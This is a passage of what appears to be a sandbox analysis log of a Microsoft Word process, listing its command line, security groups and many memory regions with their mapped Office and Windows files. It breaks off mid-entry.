# Flog Txt Version 1 # Analyzer Version: 4.3.1 # Analyzer Build Date: Nov 9 2021 05:55:33 # Log Creation Date: 12.11.2021 21:19:51.241 Process: id = "1" image_name = "winword.exe" filename = "c:\\program files (x86)\\microsoft office\\root\\office16\\winword.exe" page_root = "0x2d7a9000" os_pid = "0xec8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Microsoft Office\\Root\\Office16\\WINWORD.EXE\" /n" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 255 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 256 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 257 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 258 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 259 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 260 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 261 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 262 start_va = 0x1b0000 end_va = 0x1b3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 263 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 264 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 265 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 266 start_va = 0x1f0000 end_va = 0x1f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 267 start_va = 0x200000 end_va = 0x201fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 268 start_va = 0x210000 end_va = 0x210fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 269 start_va = 0x220000 end_va = 0x3f8fff monitored = 0 entry_point = 0x221000 region_type = mapped_file name = "winword.exe" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\WINWORD.EXE" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\winword.exe") Region: id = 270 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 271 start_va = 0x600000 end_va = 0x6bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 272 start_va = 0x6c0000 end_va = 0x6c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 273 start_va = 0x6d0000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 274 start_va = 0x6e0000 end_va = 0x6e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 275 start_va = 0x6f0000 end_va = 0x6f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 276 start_va = 0x700000 end_va = 0x701fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 277 start_va = 0x710000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 278 start_va = 0x720000 end_va = 0x721fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 279 start_va = 0x730000 end_va = 0x731fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Region: id = 280 start_va = 0x740000 end_va = 0x741fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 281 start_va = 0x750000 end_va = 0x751fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 282 start_va = 0x760000 end_va = 0x761fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 283 start_va = 0x770000 end_va = 0x773fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 284 start_va = 0x780000 end_va = 0x781fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 285 start_va = 0x790000 end_va = 0x794fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\SysWOW64\\winnlsres.dll" (normalized: "c:\\windows\\syswow64\\winnlsres.dll") Region: id = 286 start_va = 0x7a0000 end_va = 0x7a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 287 start_va = 0x7b0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 288 start_va = 0x7c0000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 289 start_va = 0x8c0000 end_va = 0x8c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 290 start_va = 0x8d0000 end_va = 0x8dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\winnlsres.dll.mui") Region: id = 291 start_va = 0x8e0000 end_va = 0x8eefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msointl30.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\1033\\msointl30.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\1033\\msointl30.dll") Region: id = 292 start_va = 0x8f0000 end_va = 0x8f3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 293 start_va = 0x900000 end_va = 0x9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 294 start_va = 0xa00000 end_va = 0xb87fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 295 start_va = 0xb90000 end_va = 0xd10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b90000" filename = "" Region: id = 296 start_va = 0xd20000 end_va = 0x211ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d20000" filename = "" Region: id = 297 start_va = 0x2120000 end_va = 0x2456fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 298 start_va = 0x2460000 end_va = 0x2508fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wwintl.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\1033\\WWINTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\1033\\wwintl.dll") Region: id = 299 start_va = 0x2510000 end_va = 0x2513fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 300 start_va = 0x2520000 end_va = 0x255ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002520000" filename = "" Region: id = 301 start_va = 0x25b0000 end_va = 0x25cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 302 start_va = 0x25d0000 end_va = 0x2788fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 303 start_va = 0x2790000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002790000" filename = "" Region: id = 304 start_va = 0x28a0000 end_va = 0x28dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028a0000" filename = "" Region: id = 305 start_va = 0x28e0000 end_va = 0x28effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028e0000" filename = "" Region: id = 306 start_va = 0x28f0000 end_va = 0x2bf7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mso40uires.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSO40UIRES.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso40uires.dll") Region: id = 307 start_va = 0x2c00000 end_va = 0x3520fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mso99lres.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSO99LRES.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso99lres.dll") Region: id = 308 start_va = 0x3530000 end_va = 0x836efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msores.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSORES.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\msores.dll") Region: id = 309 start_va = 0x8370000 end_va = 0x84e4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msointl.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\1033\\MSOINTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\1033\\msointl.dll") Region: id = 310 start_va = 0x85f0000 end_va = 0x86abfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000085f0000" filename = "" Region: id = 311 start_va = 0x86b0000 end_va = 0x87affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000086b0000" filename = "" Region: id = 312 start_va = 0x87b0000 end_va = 0x87ddfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000087b0000" filename = "" Region: id = 313 start_va = 0x87e0000 end_va = 0x87e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000087e0000" filename = "" Region: id = 314 start_va = 0x87f0000 end_va = 0x87f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000087f0000" filename = "" Region: id = 315 start_va = 0x8800000 end_va = 0x8800fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008800000" filename = "" Region: id = 316 start_va = 0x8810000 end_va = 0x884ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008810000" filename = "" Region: id = 317 start_va = 0x8850000 end_va = 0x894ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008850000" filename = "" Region: id = 318 start_va = 0x8950000 end_va = 0x8998fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-system.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat") Region: id = 319 start_va = 0x89a0000 end_va = 0x8a9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000089a0000" filename = "" Region: id = 320 start_va = 0x8aa0000 end_va = 0x929ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-s-1-5-21-1560258661-3990802383-1811730007-1000.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-S-1-5-21-1560258661-3990802383-1811730007-1000.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-s-1-5-21-1560258661-3990802383-1811730007-1000.dat") Region: id = 321 start_va = 0x92a0000 end_va = 0x969ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000092a0000" filename = "" Region: id = 322 start_va = 0x96a0000 end_va = 0x9b91fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000096a0000" filename = "" Region: id = 323 start_va = 0x9ba0000 end_va = 0x9ba0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009ba0000" filename = "" Region: id = 324 start_va = 0x9bb0000 end_va = 0x9bb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009bb0000" filename = "" Region: id = 325 start_va = 0x9bc0000 end_va = 0x9bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009bc0000" filename = "" Region: id = 326 start_va = 0x9c00000 end_va = 0x9cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009c00000" filename = "" Region: id = 327 start_va = 0x9d00000 end_va = 0x9d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009d00000" filename = "" Region: id = 328 start_va = 0x9d40000 end_va = 0x9e3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009d40000" filename = "" Region: id = 329 start_va = 0x9e40000 end_va = 0x9e40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e40000" filename = "" Region: id = 330 start_va = 0x9e50000 end_va = 0x9e50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e50000" filename = "" Region: id = 331 start_va = 0x9e60000 end_va = 0x9e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009e60000" filename = "" Region: id = 332 start_va = 0x9ea0000 end_va = 0x9f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009ea0000" filename = "" Region: id = 333 start_va = 0x9fa0000 end_va = 0xa19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009fa0000" filename = "" Region: id = 334 start_va = 0xa1a0000 end_va = 0xa1a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a1a0000" filename = "" Region: id = 335 start_va = 0xa2f0000 end_va = 0xa32ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a2f0000" filename = "" Region: id = 336 start_va = 0xa330000 end_va = 0xa42ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a330000" filename = "" Region: id = 337 start_va = 0xa430000 end_va = 0xa430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a430000" filename = "" Region: id = 338 start_va = 0xa440000 end_va = 0xa443fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a440000" filename = "" Region: id = 339 start_va = 0xa450000 end_va = 0xa450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a450000" filename = "" Region: id = 340 start_va = 0xa460000 end_va = 0xa460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a460000" filename = "" Region: id = 341 start_va = 0xa470000 end_va = 0xa47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a470000" filename = "" Region: id = 342 start_va = 0xa480000 end_va = 0xa4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a480000" filename = "" Region: id = 343 start_va = 0xa4c0000 end_va = 0xa5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a4c0000" filename = "" Region: id = 344 start_va = 0xa5c0000 end_va = 0xa5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a5c0000" filename = "" Region: id = 345 start_va = 0xa600000 end_va = 0xa6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a600000" filename = "" Region: id = 346 start_va = 0xa700000 end_va = 0xa704fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 347 start_va = 0xa710000 end_va = 0xa710fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a710000" filename = "" Region: id = 348 start_va = 0xa720000 end_va = 0xa720fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\SysWOW64\\msxml6r.dll" (normalized: "c:\\windows\\syswow64\\msxml6r.dll") Region: id = 349 start_va = 0xa730000 end_va = 0xa730fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a730000" filename = "" Region: id = 350 start_va = 0xa740000 end_va = 0xa74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a740000" filename = "" Region: id = 351 start_va = 0xa750000 end_va = 0xaf4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a750000" filename = "" Region: id = 352 start_va = 0xaf50000 end_va = 0xaf8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000af50000" filename = "" Region: id = 353 start_va = 0xaf90000 end_va = 0xb08ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000af90000" filename = "" Region: id = 354 start_va = 0xb090000 end_va = 0xb10ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b090000" filename = "" Region: id = 355 start_va = 0xb110000 end_va = 0xb14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b110000" filename = "" Region: id = 356 start_va = 0xb150000 end_va = 0xb24ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b150000" filename = "" Region: id = 357 start_va = 0xb250000 end_va = 0xb262fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000a.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000a.db") Region: id = 358 start_va = 0xb270000 end_va = 0xb2affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b270000" filename = "" Region: id = 359 start_va = 0xb2b0000 end_va = 0xb3affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b2b0000" filename = "" Region: id = 360 start_va = 0xb3b0000 end_va = 0xb3effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b3b0000" filename = "" Region: id = 361 start_va = 0xb3f0000 end_va = 0xb4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b3f0000" filename = "" Region: id = 362 start_va = 0xb4f0000 end_va = 0xb52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b4f0000" filename = "" Region: id = 363 start_va = 0xb530000 end_va = 0xb62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b530000" filename = "" Region: id = 364 start_va = 0xb630000 end_va = 0xb633fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b630000" filename = "" Region: id = 365 start_va = 0xb640000 end_va = 0xb641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b640000" filename = "" Region: id = 366 start_va = 0xb650000 end_va = 0xb650fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b650000" filename = "" Region: id = 367 start_va = 0xb660000 end_va = 0xb661fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b660000" filename = "" Region: id = 368 start_va = 0xb680000 end_va = 0xb68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b680000" filename = "" Region: id = 369 start_va = 0xb690000 end_va = 0xb76ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 370 start_va = 0xb770000 end_va = 0xbb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b770000" filename = "" Region: id = 371 start_va = 0xbb70000 end_va = 0xcb6ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-fontface.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat") Region: id = 372 start_va = 0xcb70000 end_va = 0xcc4efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 373 start_va = 0xcc50000 end_va = 0xcc91fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "d2d1.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\d2d1.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\d2d1.dll.mui") Region: id = 374 start_va = 0xcca0000 end_va = 0xcd75fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cca0000" filename = "" Region: id = 375 start_va = 0xcd80000 end_va = 0xce55fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd80000" filename = "" Region: id = 376 start_va = 0xce60000 end_va = 0xce7efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ce60000" filename = "" Region: id = 377 start_va = 0xce80000 end_va = 0xce9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ce80000" filename = "" Region: id = 378 start_va = 0xd180000 end_va = 0xd18ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000d180000" filename = "" Region: id = 379 start_va = 0xd190000 end_va = 0xd19ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000d190000" filename = "" Region: id = 380 start_va = 0xd1a0000 end_va = 0xd1affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000d1a0000" filename = "" Region: id = 381 start_va = 0xd1b0000 end_va = 0xd5b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d1b0000" filename = "" Region: id = 382 start_va = 0xd5c0000 end_va = 0xd9c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d5c0000" filename = "" Region: id = 383 start_va = 0xd9d0000 end_va = 0xddd3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d9d0000" filename = "" Region: id = 384 start_va = 0xdde0000 end_va = 0xde5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000dde0000" filename = "" Region: id = 385 start_va = 0xde60000 end_va = 0xde70fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 386 start_va = 0xde80000 end_va = 0xeebffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 387 start_va = 0xeec0000 end_va = 0xf6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000eec0000" filename = "" Region: id = 388 start_va = 0xf6c0000 end_va = 0xfb9dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000f6c0000" filename = "" Region: id = 389 start_va = 0x36330000 end_va = 0x3633ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000036330000" filename = "" Region: id = 390 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 391 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 392 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 393 start_va = 0x66230000 end_va = 0x665b8fff monitored = 0 entry_point = 0x662ccc60 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\SysWOW64\\msi.dll" (normalized: "c:\\windows\\syswow64\\msi.dll") Region: id = 394 start_va = 0x665c0000 end_va = 0x67371fff monitored = 0 entry_point = 0x665c1000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso.dll") Region: id = 395 start_va = 0x67380000 end_va = 0x6739cfff monitored = 0 entry_point = 0x67387240 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\SysWOW64\\sppc.dll" (normalized: "c:\\windows\\syswow64\\sppc.dll") Region: id = 396 start_va = 0x673a0000 end_va = 0x673bffff monitored = 0 entry_point = 0x673b2810 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\SysWOW64\\slc.dll" (normalized: "c:\\windows\\syswow64\\slc.dll") Region: id = 397 start_va = 0x673c0000 end_va = 0x67957fff monitored = 0 entry_point = 0x673c1000 region_type = mapped_file name = "mso99lwin32client.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Mso99Lwin32client.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso99lwin32client.dll") Region: id = 398 start_va = 0x67960000 end_va = 0x68074fff monitored = 0 entry_point = 0x67961000 region_type = mapped_file name = "mso40uiwin32client.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Mso40UIwin32client.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso40uiwin32client.dll") Region: id = 399 start_va = 0x68080000 end_va = 0x68381fff monitored = 0 entry_point = 0x68081000 region_type = mapped_file name = "mso30win32client.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Mso30win32client.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso30win32client.dll") Region: id = 400 start_va = 0x68390000 end_va = 0x68564fff monitored = 0 entry_point = 0x68391000 region_type = mapped_file name = "mso20win32client.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Mso20win32client.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso20win32client.dll") Region: id = 401 start_va = 0x68570000 end_va = 0x69161fff monitored = 0 entry_point = 0x68571000 region_type = mapped_file name = "oart.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\OART.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\oart.dll") Region: 